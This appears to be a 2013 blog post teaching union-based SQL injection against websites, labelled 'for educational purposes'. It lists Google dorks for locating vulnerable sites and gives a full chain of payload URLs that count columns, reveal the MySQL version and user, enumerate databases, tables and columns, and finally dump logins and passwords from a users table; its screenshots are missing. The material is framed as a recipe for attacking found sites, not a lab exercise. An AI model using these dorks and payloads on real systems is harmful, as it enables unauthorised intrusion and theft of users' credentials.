Friday, 11 October 2013

SQL injection Tutorial



SQL injection Tutorial


FOR EDUCATIONAL PURPOSES



Finding vulnerable sites
Finding amount of columns
Getting mysql version current user
Getting Databases
Getting Tables
Getting Columns
Getting Usernames and Passwords






1. Finding vulnerable sites


To find Vulnerable sites you are going to use Google Dorks.

Some common dorks are:

====================================================================

Code:


inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=


=================================================================


lets say you got this site:

=============================================
Code:


http://site.com/news/view.php?id=828
============================================
if we add a ' before or after the numbers it should look something like this if its vulnerable:



2. Finding amount of columns



To find the right amount of columns we are using "order by". here is how it works:


===============================================================


Code:

http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)

===============================================================

This means or site has 8 columns and we will now move over to "union select".


This is how it works:
===============================================================
Code:


http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--

===============================================================


Note the hyphen - before the numbers!
===============================================================


This should make the website to show some numbers on the screen like this:




===============================================================

This meens its absolutly sure that the site is vulnerable to sql injection.


3. Getting MySQL version and Current User



Now we wanna know the MySQL version. If its over 5 then its injectable by this Tut. (if its under 4 then you have to guess tables and columns).



Code:


http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--








To get the Current user you type this:


===============================================================

Code:


http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--

===============================================================


This should display:










4. Getting Databases





Now we wanna find the databases and the Current database.

Here the syntax for all databases:

===============================================================


Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--


===============================================================

It should displays something like this:







Now wel would like to now what is the current database, it's pretty obvious in this case but usefull sometimes.


Syntax for current database:

===============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8


===============================================================

This should display something like this:










5. Getting Tables




Now we want to know the tables on in the database and for this we will conintue using "union select".


===============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--


===============================================================


This should display something like this:








We now know that the table that passwords should be stored in are called bpusers, write it down and move on.


6. Getting Columns



Now we want to know the columns.



============================================================

Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--


============================================================

This should display something like this:






7. Dumping users/pass





Now you would like to dump logins and passwords from bpusers.


Here is the code for thath:

==================================================================
Code:


http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--

======================================================




(NOTE: 0x3a will make a : between logins and passwords.)



You have now performed a SQL injection attack.

0 comments:

Post a Comment